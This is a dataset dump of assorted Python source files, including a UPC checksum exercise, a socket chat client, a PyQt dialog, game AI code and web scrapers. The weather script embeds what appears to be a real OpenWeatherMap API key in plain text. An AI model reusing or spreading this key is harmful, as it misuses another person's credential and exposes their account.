tradeanalyzer.write(str(firstStrat.analyzers.getbyname(\"ta\").get_analysis()))\n# time_drawdown_analyzer.write(json.dumps(firstStrat.analyzers.getbyname(\"timedrawdown\").get_analysis()))\n# sqn_analyzer.write(json.dumps(firstStrat.analyzers.getbyname(\"sqn\").get_analysis()))\n\n# annualreturnanalyzer.close()\n# drawdownanalyzer.close()\n# sharperatioanalyzer.close()\n# vwranalyzer.close()\n# returnanalyzer.close()\n# tradeanalyzer.close() \n# time_drawdown_analyzer.close()\n# sqn_analyzer.close()\n\n\n\n\n\n","sub_path":"Moving_avg_futures/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"438482101","text":"#!/usr/bin/env python3\n\n\"\"\"\n Perform a checksum on a UPC\n\n Assignment 1, Exercise 2, INF1340 Fall 2014\n\"\"\"\n\n__author__ = 'Susan Sim'\n__email__ = \"ses@drsusansim.org\"\n\n__copyright__ = \"2014 Susan Sim\"\n__license__ = \"MIT License\"\n\n__status__ = \"Prototype\"\n\n# imports one per line\n\n\ndef checksum(upc):\n \"\"\"\n Checks if the digits in a UPC is consistent with checksum\n\n :param upc: a 12-digit universal product code\n :return:\n Boolean: True, checksum is correct\n False, otherwise\n :raises:\n TypeError if input is not a string\n ValueError if string is the wrong length (with error string stating how many digits are over or under\n\n Step 1: Find the sum of the digits in the odd positions then multiply the sum by 3\n Step 2: Find the sum of the digits in the even position (not including the 12th digit)\n Add the sum of the even position digits to Step 1\n Step 3: Take the result of Step 2, and find the remainder when divided by 10\n\n If Step 3 is equal to zero, check to see if the 12th digit of the upc is zero\n If Step 3 = 0 and the 12th digit = 0, then return True\n Else, False\n If Step 3 is not equal to zero, subtract it from 10\n Take this result and check to see if it is equal to the 12th digit of the upc\n If 10 - Step = 12th digit, then return True\n Else, return False\n \"\"\"\n if type(upc) is str:\n # Checking if upc is a string\n print(\"string\")\n else:\n # If not a string, raise TypeError\n raise TypeError(\"upc is not a string\")\n\n if len(upc) == 12:\n # Checking the number of digits in upc\n print(\"12\")\n else:\n # If upc is not 12 digits, raise ValueError\n if len(upc) > 12:\n # If upc is not 12 digits, calculate how many digits are over or under 12\n print(\"upc is\", (len(upc) - 12), \"digits more than 12\")\n else:\n print(\"upc is\", (12 - len(upc)), \"digits less than 12\")\n raise ValueError(\"Error because upc must be 12 digits\")\n\n list(upc)\n # Separate the digits of the upc into an array\n print(list(upc))\n\n upc = [int(i) for i in upc]\n # Convert each digit of upc into an integer so we can do math\n print(upc[1])\n\n step_1 = sum(upc[::2]) * 3\n # Add every other digit starting with the first digit\n # Then multiply that by 3\n print(step_1)\n\n step_2 = sum(upc[1::2]) - upc[11] + step_1\n # Add every other digit starting with the second digit, but exclude the last digit\n # Add that to the result of step_1\n\n # Find the remainder when divided by 10\n step_3 = step_2 % 10\n\n # Check to see if step_3 is equal to 0\n # If step_3 is not equal to 0, subtract step_3 from 10\n if step_3 == 0:\n last_digit = 0\n else:\n last_digit = 10 - step_3\n\n # Check to see if calculations is equal to the last digit of the upc\n # If calculations is equal to the last digit of the upc, then it is a valid upc\n # If calculations do not equal the last digit of the upc, then it is not a valid upc\n if last_digit == upc[11]:\n return True\n else:\n return False\n\n\n\n\n\n","sub_path":"exercise2.py","file_name":"exercise2.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"31558555","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('products', '0019_auto_20170420_1213'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='policy',\n name='required_documents_application',\n field=models.CharField(max_length=200, null=True, blank=True),\n ),\n migrations.AddField(\n model_name='policy',\n name='required_documents_claim',\n field=models.CharField(max_length=200, null=True, blank=True),\n ),\n ]\n","sub_path":"mango/products/migrations/0020_auto_20170420_1222.py","file_name":"0020_auto_20170420_1222.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"258824738","text":"def build(bld):\n bld.stlib(\n source = [\n 'classifier.cpp',\n 'recommender.cpp',\n 'weight_manager.cpp',\n ],\n target = 'jubatus_dump'\n )\n\n def make_test(src):\n bld.program(\n features = 'gtest',\n target = src[0: src.find('.')],\n source = src,\n use = 'jubatus_dump JUBATUS',\n )\n\n make_test('types_test.cpp')\n make_test('classifier_test.cpp')\n","sub_path":"src/jubatus/dump/wscript","file_name":"wscript","file_ext":"","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"12418404","text":"import requests\nimport pyttsx3 as pyttsx\ndef getWeather():\n apiKey='0f4b173c7a1997bf7c8ab1984d5ebe63&q'\n zCode = '08837'\n api_address='http://api.openweathermap.org/data/2.5/weather?zip={},us&appid=0f4b173c7a1997bf7c8ab1984d5ebe63&q='.format(zCode)\n url = api_address\n json_data = requests.get(url).json()\n weather = json_data[\"weather\"][0][\"description\"]\n main = json_data[\"main\"]\n minTemp = int((float(main[\"temp_min\"]) -273.15 ) * (9/5) + 32)\n maxTemp = int((float(main[\"temp_max\"]) -273.15) * (9/5) + 32)\n currTemp = int((float(main[\"temp\"]) -273.15) * (9/5) + 32)\n location = json_data[\"name\"]\n engine = pyttsx.init()\n outStr = \"Weather in {} is {} with a high of {}°F a low of {}°F and current temeperature of {}°F.\".format(location,weather,maxTemp,minTemp,currTemp)\n print(outStr)\n engine.say(outStr)\n engine.runAndWait()","sub_path":"Code/AI/bCast.py","file_name":"bCast.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"53002417","text":"\"\"\"\nФункции ​к​лиента:​\n- сформировать ​​presence-сообщение;\n- отправить ​с​ообщение ​с​ерверу;\n- получить ​​ответ ​с​ервера;\n- разобрать ​с​ообщение ​с​ервера;\n- параметры ​к​омандной ​с​троки ​с​крипта ​c​lient.py ​​ ​[​]:\n- addr ​-​ ​i​p-адрес ​с​ервера;\n- port ​-​ ​t​cp-порт ​​на ​с​ервере, ​​по ​у​молчанию ​​7777.\n\"\"\"\nimport sys\nimport time\nimport threading\nimport logging\nimport log.client_log_config\nfrom socket import socket, AF_INET, SOCK_STREAM\nfrom errors import UsernameToLongError, ResponseCodeLenError, MandatoryKeyError, ResponseCodeError\nfrom jim.config import *\nfrom jim.utils import send_message, get_message\nfrom log.decorators import Log\n\n# Получаем по имени клиентский логгер, он уже нестроен в client_log_config\nlogger = logging.getLogger('client')\nlog = Log(logger)\n\n\n# функция формирования сообщения\n@log\ndef create_presence(account_name=\"Guest\"):\n \"\"\"\n Сформировать ​​presence-сообщение\n :param account_name: Имя пользователя\n :return: Словарь сообщения\n \"\"\"\n # Если имя не строка\n if not isinstance(account_name, str):\n # Генерируем ошибку передан неверный тип\n raise TypeError\n # Если длина имени пользователя больше 25 символов\n if len(account_name) > 25:\n # генерируем нашу ошибку имя пользователя слишком длинное\n raise UsernameToLongError(account_name)\n # если все хорошо, то\n # формируем словарь сообщения\n message = {\n ACTION: PRESENCE,\n TIME: time.time(),\n USER: {\n ACCOUNT_NAME: account_name\n }\n }\n\n # возвращаем сообщение в виде словаря\n return message\n\n\n# функция разбора ответа сервера\n@log\ndef translate_message(response):\n \"\"\"\n Разбор сообщения\n :param response: Словарь ответа от сервера\n :return: корректный словарь ответа\n \"\"\"\n # Передали не словарь\n if not isinstance(response, dict):\n raise TypeError\n # Нету ключа response\n if RESPONSE not in response:\n # Ошибка нужен обязательный ключ\n raise MandatoryKeyError(RESPONSE)\n # если все хорошо, то\n # получаем код ответа\n code = response[RESPONSE]\n # длина кода не 3 символа\n if len(str(code)) != 3:\n # Ошибка неверная длина кода ошибки\n raise ResponseCodeLenError(code)\n # неправильные коды символов\n if code not in RESPONSE_CODES:\n # ошибка неверный код ответа\n raise ResponseCodeError(code)\n\n # возвращаем ответ\n return response\n\n\ndef read_messages(client, account_name):\n \"\"\"\n Клиент читает входящие сообщения в бесконечном цикле\n :param client: сокет клиента\n \"\"\"\n while True:\n # читаем сообщение\n message = get_message(client)\n print(message['message'])\n\n\ndef create_message(message_to, text, account_name='Guest'):\n return {ACTION: MSG, TIME: time.time(), TO: message_to, FROM: account_name, MESSAGE: text}\n\n\n# ЗАПУСКАЕМ КЛИЕНТА!!!\nif __name__ == '__main__':\n # Создать TCP-сокет клиента\n client = socket(AF_INET, SOCK_STREAM) # Создать сокет TCP\n # Пытаемся получить параметры скрипта\n # Получаем аргументы скрипта\n #------------ip-адрес-----------#\n # если ip-адрес указан в параметрах -p \n try:\n addr = sys.argv[1]\n # если ip-адрес не указан в параметрах\n except IndexError:\n addr = 'localhost'\n #--------------порт-------------#\n # если порт указан в параметрах\n try:\n port = int(sys.argv[2])\n # если порт не указан в параметрах\n except IndexError:\n port = 7777\n # если порт - не целое число\n except ValueError:\n print('Порт должен быть целым числом')\n sys.exit(0)\n try:\n account_name = 'yyy'\n # account_name = sys.argv[3]\n print(account_name)\n except IndexError:\n print('Укажите получателя')\n #sys.exit(0)\n #print(sys.argv)\n # ДАННЫЕ ПОЛУЧИЛИ -> СОЕДИНЯЕМСЯ С СЕРВЕРОМ\n # Соединиться с сервером\n client.connect((addr, port))\n # Сформировать сообщение серверу\n #account_name = 'Console0'\n presence = create_presence(account_name)\n # Отправить сообщение серверу\n send_message(client, presence)\n # Получить ответ сервера\n response = get_message(client)\n # Разобрать ответ сервера\n response = translate_message(response)\n #print(response)\n if response['response'] == OK:\n t = threading.Thread(target=read_messages, args=(client, account_name))\n t.start()\n\n while True:\n message_str = input(':) >')\n if message_str.startswith('message'):\n params = message_str.split()\n try:\n to = params[1]\n text = ' '.join(params[2:])\n except IndexError:\n print('Не задан получатель или текст сообщения')\n else:\n message = create_message(to, text, account_name)\n send_message(client, message)\n\n elif message_str == 'help':\n print('message <получатель> <текст> - отправить сообщение')\n elif message_str == 'exit':\n break\n else:\n print('Неверная команда, для справки введите help')\n\n client.disconnect()\n","sub_path":"EX_8/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":6709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"54055680","text":"class Solution(object):\n\n def detectCapitalUse(self, word):\n \"\"\"\n Given a word, you need to judge whether the usage of capitals in it is right or not.\n\n We define the usage of capitals in a word to be right when one of the following cases holds:\n\n All letters in this word are capitals, like \"USA\".\n All letters in this word are not capitals, like \"leetcode\".\n Only the first letter in this word is capital, like \"Google\".\n Otherwise, we define that this word doesn't use capitals in a right way.\n\n Note: The input will be a non-empty word consisting of uppercase and lowercase latin letters.\n\n Runtime: 32 ms, faster than 36.82% of Python3 online submissions for Detect Capital.\n Memory Usage: 12.7 MB, less than 100.00% of Python3 online submissions for Detect Capital.\n\n\n Parameters\n ----------\n word : str\n\n\n Returns\n -------\n\n ret : bool\n\n\n Examples\n --------\n >>> Solution().detectCapitalUse(\"FlaG\")\n False\n\n >>> Solution().detectCapitalUse(\"USA\")\n True\n\n \"\"\"\n\n can_low = can_cap = True\n\n for idx in range(len(word)):\n if word[idx].isupper():\n if not can_cap:\n return False\n\n if idx > 0 and can_cap:\n can_low = False\n\n else:\n if not can_low:\n return False\n\n can_cap = False\n return True\n","sub_path":"algorithms/520_Detect_Capital.py","file_name":"520_Detect_Capital.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"537071419","text":"# -*- coding: utf-8 -*-\n\nfrom base import Map\n\nCLASS = Map({\n 1: 'IN',\n 3: 'CH',\n 4: 'HS',\n 254: 'NONE',\n 255: 'ANY'\n})\nQR = Map({\n 0: 'QUERY',\n 1: 'RESPONSE'\n})\n\nOPCODE = Map({\n 0: 'QUERY',\n 1: 'IQUERY',\n 2: 'STATUS',\n 4: 'NOTIFY',\n 5: 'UPDATE'\n})\n\nRCODE = Map({\n 0: 'NOERROR',\n 1: 'FORMERR',\n 2: 'SERVFAIL',\n 3: 'NXDOMAIN',\n 4: 'NOTIMP',\n 5: 'REFUSED',\n 6: 'YXDOMAIN',\n 7: 'YXRRSET',\n 8: 'NXRRSET',\n 9: 'NOTAUTH',\n 10: 'NOTZONE'\n})\n\nTYPE = Map({\n 1: 'A',\n 2: 'NS',\n 5: 'CNAME',\n 6: 'SOA',\n 28: 'AAAA',\n 41: 'OPT',\n 255: 'ANY',\n})\n","sub_path":"const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"139474627","text":"\n\nfrom PyQt5.QtWidgets import (QWidget, QPushButton,\n QMenu, QAction, QDialog,\n QTableView, QHeaderView, QLineEdit, QLabel, QFrame, QVBoxLayout, QHBoxLayout, QComboBox)\nfrom PyQt5.QtGui import QIcon, QCursor\nfrom PyQt5.QtCore import Qt, QRegExp, QRect, QSize, QPoint, QItemSelectionModel\n\n# import utilities as Utilities\n\nfrom sortBeautifulWordsFilterProxyModel import SortBeautifulWordsFilterProxyModel\nimport globals\nimport logging\n\n\nDIALOG_WIDTH = 1000\nDIALOG_HEIGHT = 700\nIMAGE_WIDTH = DIALOG_WIDTH\nIMAGE_HEIGHT = 103\nCOLUMN_TO_FILTER = 0\nSPACER_SIZE = 20\n\n\nclass BeautifulWordSelectorDialog(QDialog):\n def __init__(self, title, classifications, parent=None,):\n QDialog.__init__(self, parent)\n self.parent = parent\n self._selectedWord = \"\"\n self.classifications = classifications\n\n self.lastStart = 0\n self.title = title\n self.proxyModel = SortBeautifulWordsFilterProxyModel(self)\n # This property holds whether the proxy model is dynamically sorted and filtered whenever the contents of the source model change\n self.proxyModel.setDynamicSortFilter(True)\n self.sourceView = QTableView() # where we store the unfiltered list\n self.tableView = QTableView()\n self.selectedWord = None\n self.tableView.setAlternatingRowColors(True)\n self.tableView.setModel(self.proxyModel)\n self.tableView.setSortingEnabled(True)\n self.setWindowTitle(title)\n self.tableView.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)\n self.tableView.horizontalHeader().setSectionResizeMode(QHeaderView.ResizeToContents)\n self.tableView.horizontalHeader().setDefaultAlignment(Qt.AlignLeft)\n self.tableView.setAlternatingRowColors(True)\n self.tableView.setSortingEnabled(True)\n self.tableView.verticalHeader().hide()\n self.tableView.setSelectionMode(QTableView.SingleSelection)\n self.tableView.setSelectionBehavior(QTableView.SelectItems)\n self.tableView.clicked.connect(self.selectItem)\n # selectionModel = self.tableView.selectionModel()\n # selectionModel.selectionChanged.connect(self.selectionChanged)\n\n self.filterString = \"\"\n self.filterColumn = 0\n self.resetFilterEnables()\n self.initUI()\n\n def resetFilterEnables(self):\n self.wordFilterEnabled = False\n self.meaningFilterEnabled = False\n self.tagFilterEnabled = False\n self.classificationFilterEnabled = False\n\n def clearFilters(self):\n logging.debug(\"Clearing the filters\")\n self.wordFilter.setText(\"\")\n self.meaningFilter.setText(\"\")\n self.classificationFilter.setCurrentIndex(0)\n self.tagFilter.setText(\"\")\n\n def AddClearFiltersButton(self):\n self.clearFiltersButton = QPushButton('', self)\n if(globals.USE_STYLESHEETS_FOR_COLOR):\n self.clearFiltersButton.setStyleSheet(\"QPushButton { color: rgb(255, 255, 255);\\n\"\n \"background-color: rgb(0, 0, 0); }\\n\"\n \"QPushButton:pressed { color: rgb(255, 255, 255);\\n\"\n \"background-color: rgb(47,79,79); }\\n\"\n \"QPushButton { border: none; }\")\n self.clearFiltersButton.clicked.connect(self.clearFilters)\n self.clearFiltersButton.setIcon(\n QIcon(\":/images/images/clearAll.png\"))\n self.clearFiltersButton.setIconSize(QSize(32, 32))\n self.headerLayout.addWidget(self.clearFiltersButton)\n\n def createHeader(self):\n self.headerLayout = QHBoxLayout()\n self.headerLayout.setObjectName(\"self.headerLayout\")\n self.headerLayout.setContentsMargins(10, 10, 10, 10)\n self.headerFrame = QFrame(self.horizontalLayoutWidget)\n self.headerFrame.setMinimumSize(QSize(DIALOG_WIDTH-20, IMAGE_HEIGHT))\n self.headerFrame.setMaximumSize(QSize(DIALOG_WIDTH-20, IMAGE_HEIGHT))\n self.headerFrame.setBaseSize(QSize(0, 0))\n self.headerFrame.setAutoFillBackground(False)\n self.headerFrame.setObjectName(\"HeaderBackgroundImage\")\n self.headerFrame.setStyleSheet(\n \"QFrame#HeaderBackgroundImage { background-repeat:no-repeat; background-position: left; background-image: url(:/images/images/WomanReadingHeader.png); }\")\n self.headerFrame.setFrameShape(QFrame.StyledPanel)\n self.headerFrame.setFrameShadow(QFrame.Raised)\n self.headerFrame.setLayout(self.headerLayout)\n self.headerSpacerWidget = QWidget(self.headerFrame)\n self.headerSpacerWidget.setObjectName(\"headerSpacerWidget\")\n self.headerSpacerWidget.setGeometry(\n QRect(0, 0, SPACER_SIZE, SPACER_SIZE))\n self.headerSpacerWidget.setObjectName(\"headerSpacerWidget\")\n self.wordFilter = QLineEdit(self.headerFrame)\n self.wordFilterLabel = QLabel(\" Word Filter\", self.headerFrame)\n self.wordFilterLabel.setBuddy(self.wordFilter)\n if(globals.USE_STYLESHEETS_FOR_COLOR):\n self.wordFilter.setStyleSheet(\"color: rgb(0, 0, 0);\\n\"\n \"background-color: rgb(255, 255, 255);\")\n self.wordFilterLabel.setStyleSheet(\n \"QLabel { color: rgb(255, 255, 255); font-weight:600 }\")\n self.wordFilterLabel.setObjectName(\"wordFilterLabel\")\n self.headerLayout.addStretch()\n self.headerLayout.addWidget(self.headerSpacerWidget)\n self.headerLayout.addWidget(self.wordFilterLabel)\n self.headerLayout.addWidget(self.wordFilter)\n if(globals.USE_STYLESHEETS_FOR_COLOR):\n self.wordFilter.setStyleSheet(\n \"background-color: #FFFFFF; padding:1px 1px 1px 1px\")\n self.wordFilter.setFixedWidth(120)\n\n self.wordFilter.textChanged.connect(self.setWordFilter)\n self.wordFilter.setToolTip(\n \"Enter a starting letter or letters to find words\")\n self.meaningFilterLabel = QLabel(\" Meaning Filter\", self.headerFrame)\n self.meaningFilter = QLineEdit(self.headerFrame)\n if(globals.USE_STYLESHEETS_FOR_COLOR):\n self.meaningFilter.setStyleSheet(\"color: rgb(0, 0, 0);\\n\"\n \"background-color: rgb(255, 255, 255);\")\n self.meaningFilterLabel.setBuddy(self.meaningFilter)\n self.meaningFilterLabel.setStyleSheet(\n \"QLabel { color: rgb(255, 255, 255); font-weight:600 }\")\n self.headerLayout.addWidget(self.meaningFilterLabel)\n self.headerLayout.addWidget(self.meaningFilter)\n if(globals.USE_STYLESHEETS_FOR_COLOR):\n self.meaningFilter.setStyleSheet(\n \"background-color: #FFFFFF; padding:1px 1px 1px 1px\")\n self.meaningFilter.setFixedWidth(120)\n self.meaningFilter.textChanged.connect(self.setMeaningFilter)\n self.meaningFilter.setToolTip(\n \"Enter a meaning for which you would like to find a word\")\n self.tagFilterLabel = QLabel(\" Tag Filter\", self.headerFrame)\n self.tagFilter = QLineEdit(self.headerFrame)\n if(globals.USE_STYLESHEETS_FOR_COLOR):\n self.tagFilter.setStyleSheet(\"color: rgb(0, 0, 0);\\n\"\n \"background-color: rgb(255, 255, 255);\")\n self.tagFilterLabel.setBuddy(self.tagFilter)\n if(globals.USE_STYLESHEETS_FOR_COLOR):\n self.tagFilterLabel.setStyleSheet(\n \"QLabel { color: rgb(255, 255, 255); font-weight:600 }\")\n self.headerLayout.addWidget(self.tagFilterLabel)\n self.headerLayout.addWidget(self.tagFilter)\n if(globals.USE_STYLESHEETS_FOR_COLOR):\n self.tagFilter.setStyleSheet(\n \"background-color: #FFFFFF; padding:1px 1px 1px 1px\")\n self.tagFilter.setFixedWidth(120)\n self.tagFilter.textChanged.connect(self.setTagFilter)\n self.tagFilter.setToolTip(\n \"Enter a word you like like to find synonyms for\")\n # These classifications need to move into a file that is generated from processing the word list; they should not be hard coded\n self.classificationFilterLabel = QLabel(\n \" Classification Filter\", self.headerFrame)\n self.classificationFilter = QComboBox(self.headerFrame)\n if(globals.USE_STYLESHEETS_FOR_COLOR):\n self.classificationFilter.setStyleSheet(\"color: rgb(0, 0, 0);\\n\"\n \"background-color: rgb(255, 255, 255); padding:1px 1px 1px 1px;\")\n self.classificationFilter.addItems(self.classifications)\n self.classificationFilterValue = self.classifications[0]\n if(globals.USE_STYLESHEETS_FOR_COLOR):\n self.classificationFilterLabel.setStyleSheet(\n\n \"QLabel { color: rgb(255, 255, 255); font-weight:600 }\")\n self.tagFilterLabel.setStyleSheet(\n \"QLabel { color: rgb(255, 255, 255); font-weight:600 }\")\n self.classificationFilterLabel.setBuddy(self.classificationFilter)\n self.headerLayout.addWidget(self.classificationFilterLabel)\n self.headerLayout.addWidget(self.classificationFilter)\n self.AddClearFiltersButton()\n self.headerLayout.addStretch()\n\n self.classificationFilter.setFixedWidth(120)\n self.classificationFilter.currentTextChanged.connect(\n self.setClassificationFilter)\n self.classificationFilter.setToolTip(\n \"Select a Classification for which you would like to find words\")\n\n def initUI(self):\n mainLayout = QVBoxLayout()\n self.horizontalLayoutWidget = QWidget(self)\n self.horizontalLayoutWidget.setGeometry(\n QRect(0, 0, DIALOG_WIDTH, IMAGE_HEIGHT))\n self.createHeader()\n self.acceptButton = QPushButton(\"Insert Selected Word\", self)\n self.acceptButton.setToolTip(\n 'Insert the selected word into your document')\n self.acceptButton.clicked.connect(\n lambda: self.acceptSelection(self.selectedWord))\n self.acceptButton.setEnabled(False)\n mainLayout.addWidget(self.headerFrame)\n mainLayout.addWidget(self.tableView)\n mainLayout.addWidget(self.acceptButton)\n self.setGeometry(300, 300, DIALOG_WIDTH, DIALOG_HEIGHT)\n self.setFixedSize(DIALOG_WIDTH, DIALOG_HEIGHT)\n self.setWindowTitle(self.title)\n self.setLayout(mainLayout)\n\n def selectItem(self, index):\n mapped_index = self.proxyModel.mapToSource(index)\n model = mapped_index.model()\n row = mapped_index.row()\n column = mapped_index.column()\n standardItem = model.item(row, 0)\n modelIndex = standardItem.index()\n self.selectedWord = modelIndex.data(0)\n self.acceptButton.setEnabled(True)\n selectionModel = self.tableView.selectionModel()\n # newIndex = self.tableView.model().index(row, 0)\n # selectionModel.select(newIndex, QItemSelectionModel.ClearAndSelect)\n # self.selectionMenu = QMenu(self)\n # icon = QIcon(\":/images/images/clipboard-paste-document-text.png\")\n # selectionAction = self.selectionMenu.addAction(icon,\n # 'Click {} to insert this word into your document'.format(\"here\"))\n\n # selectionAction.triggered.connect(lambda: self.acceptSelection(data))\n # x = QCursor.pos().x()\n # y = QCursor.pos().y()\n # newPosition = QPoint(x+5, y+5)\n # self.selectionMenu.exec_(newPosition)\n\n def acceptSelection(self, data):\n if(data):\n self.selectedWord = data\n self.accept()\n\n def setWordFilter(self):\n text = self.wordFilter.text()\n if((text is not None) and (not text.isspace()) and (text != \"\")):\n self.filterString = \"^\" + text\n self.wordFilterPattern = repr(\n self.filterString)[1:-1]\n self.filterColumn = 0\n self.wordFilterEnabled = True\n self.filterRegExpChanged()\n else:\n self.wordFilterEnabled = False\n self.filterString = \"\"\n self.wordFilterPattern = repr(\n self.filterString)[1:-1]\n self.filterRegExpChanged()\n\n def setMeaningFilter(self):\n text = self.meaningFilter.text()\n if((text is not None) and (not text.isspace()) and (text != \"\")):\n self.meaningFilterPattern = repr(\n text)[1:-1]\n self.filterColumn = 1\n self.meaningFilterEnabled = True\n self.filterRegExpChanged()\n else:\n self.meaningFilterEnabled = False\n self.filterString = \"\"\n self.meaningFilterPattern = repr(\n self.filterString)[1:-1]\n self.filterRegExpChanged()\n\n def setTagFilter(self):\n text = self.tagFilter.text()\n if((text is not None) and (not text.isspace()) and (text != \"\")):\n self.tagFilterPattern = repr(\n text)[1:-1]\n self.filterColumn = 2\n self.tagFilterEnabled = True\n self.filterRegExpChanged()\n else:\n self.tagFilterEnabled = False\n self.filterString = \"\"\n self.tagFilterPattern = repr(\n self.filterString)[1:-1]\n self.filterRegExpChanged()\n\n def setClassificationFilter(self, text):\n \"\"\"\n Change the combo box value . Values represent the different file\n extensions.\n \"\"\"\n if(text != \"All\"):\n self.classificationFilterValue = text\n self.filterString = text\n self.classificationFilterPattern = repr(\n text)[1:-1]\n self.classificationFilterEnabled = True\n self.filterColumn = 3\n self.filterRegExpChanged()\n else:\n self.filterString = \"\"\n self.classificationFilterPattern = repr(\n self.filterString)[1:-1]\n self.filterColumn = 3\n self.classificationFilterEnabled = False\n self.filterRegExpChanged()\n\n def setSourceModel(self, model):\n # the proxy model points to a source model then we create to hold the actual data\n self.proxyModel.setSourceModel(model)\n self.sourceView.setModel(model)\n\n def filterRegExpChanged(self):\n syntax = QRegExp.RegExp # can be one of QRegExp.RegExp2, QRegExp.WildCard, QRegExp.RegExp2 etc, see https://doc.qt.io/qt-5/qregexp.html#PatternSyntax-enum\n caseSensitivity = Qt.CaseInsensitive\n regExp = QRegExp(self.filterString,\n caseSensitivity, syntax)\n # This property holds the QRegExp used to filter the contents of the source model\n self.proxyModel.setFilterKeyColumn(self.filterColumn)\n self.proxyModel.setFilterRegExp(regExp)\n\n @ property\n def selectedWord(self):\n return self._selectedWord\n\n @ selectedWord.setter\n def selectedWord(self, newWord):\n self._selectedWord = newWord\n # Reference: https://doc.qt.io/archives/qtjambi-4.5.2_01/com/trolltech/qt/qtjambi-customfilter.html\n","sub_path":"lyrical/beautifulWordSelectorDialog.py","file_name":"beautifulWordSelectorDialog.py","file_ext":"py","file_size_in_byte":15238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"284747911","text":"import random\n\nfrom core.ai import behaviors\nfrom core.ai.personalities import Personality\n\n\nclass WarzoneWarrior(Personality):\n @classmethod\n def get_behavior(cls, host, last_behavior, short_term_state):\n cls.seek_threats(host, short_term_state)\n if short_term_state.enemies:\n target_point = cls.get_closest_enemy_point(\n host, short_term_state.enemies)\n if target_point is not None:\n distance = target_point.manhattan_distance_to(host.location.point)\n if distance < 10:\n return cls.engage_immediate_enemies(\n host, target_point, distance, last_behavior)\n\n # return cls.walk_somewhere_or_continue(host, last_behavior)\n\n @classmethod\n def seek_threats(cls, host, short_term_state):\n unknown_objects = host.location.level.game_objects.difference(\n short_term_state.known_objects\n )\n for unknown_object in unknown_objects:\n cls.identify_relation(host, unknown_object, short_term_state)\n\n @classmethod\n def identify_relation(cls, host, game_object, short_term_state):\n if host is game_object:\n short_term_state.known_objects.add(host)\n return\n\n if host.alliance.is_enemy(game_object):\n short_term_state.add_enemy(game_object)\n\n @classmethod\n def engage_immediate_enemies(cls, host, target_point, distance, last_behavior):\n target_coordinate = (target_point.x, target_point.y)\n if distance <= 1:\n return behaviors.MeleeAttack(host, target_point)\n\n if isinstance(last_behavior, behaviors.Move):\n last_behavior.adjust_target_coordinates(target_coordinate)\n return last_behavior\n return behaviors.Move(host, target_coordinate)\n\n @classmethod\n def get_closest_enemy_point(cls, host, enemies):\n living_enemies = [\n enemy.location.point\n for enemy in enemies\n if enemy.health.dead is False\n ]\n if living_enemies:\n return host.location.point.get_closest_point(living_enemies)\n\n @classmethod\n def walk_somewhere_or_continue(cls, host, last_behavior):\n if last_behavior and not last_behavior.finished:\n return last_behavior\n\n level = host.location.level\n target_coordinate = (\n random.randint(1, level.max_x),\n random.randint(1, level.max_y)\n )\n\n return behaviors.Move(host, target_coordinate)\n","sub_path":"bfgame/ai/personalities/warzone.py","file_name":"warzone.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"320597429","text":"from helper import multi_request\nfrom urllib.parse import quote\nimport requests\nfrom lxml import html\n\n\nclass DatSemShift:\n cached_request = None\n source_phrases = []\n target_phrases = []\n\n def populate_sources(self):\n if self.cached_request == None:\n r = requests.get(\"http://datsemshift.ru/search\")\n self.cached_request = html.fromstring(r.content)\n self.source_phrases = self.cached_request.xpath('//*[@id=\"source\"]/option/text()')\n\n def populate_targets(self):\n if self.cached_request == None:\n r = requests.get(\"http://datsemshift.ru/search\")\n self.cached_request = html.fromstring(r.content)\n self.target_phrases = self.cached_request.xpath('//*[@id=\"target\"]/option/text()')\n\n def semshift(self, search_term):\n if len(self.source_phrases) == 0:\n self.populate_sources()\n urls = [f'http://datsemshift.ru/search?source={quote(input)}'\n for input in self.source_phrases if search_term in input]\n\n results = multi_request(urls)\n\n meanings = [item for sublist in\n [html.fromstring(r.content).xpath('/html/body/main/div/table/tr/td[5]/text()') for r in results]\n for item in sublist if item != 'Meaning 2']\n\n return meanings\n\n def reverse(self, search_term):\n if len(self.target_phrases) == 0:\n self.populate_targets()\n urls = [f'http://datsemshift.ru/search?target={quote(input)}'\n for input in self.target_phrases if search_term in input]\n\n results = multi_request(urls)\n\n meanings = [item for sublist in\n [html.fromstring(r.content).xpath('/html/body/main/div/table/tr/td[3]/text()') for r in results]\n for item in sublist if item != 'Meaning 1']\n\n return meanings\n","sub_path":"datsemshift.py","file_name":"datsemshift.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"409318952","text":"# https://leetcode.com/explore/interview/card/top-interview-questions-easy/92/array/727/\n# https://leetcode.com/problems/remove-duplicates-from-sorted-array/description/\n\n# Remove Duplicates from Sorted Array\n#\n# Given a sorted array nums, remove the duplicates in-place such that\n# each element appear only once and return the new length.\n\nimport unittest\n\n\nclass Solution:\n\n # Note: 2 pointer one pass copy solution.\n #\n # grow 2 region like qs partition.\n 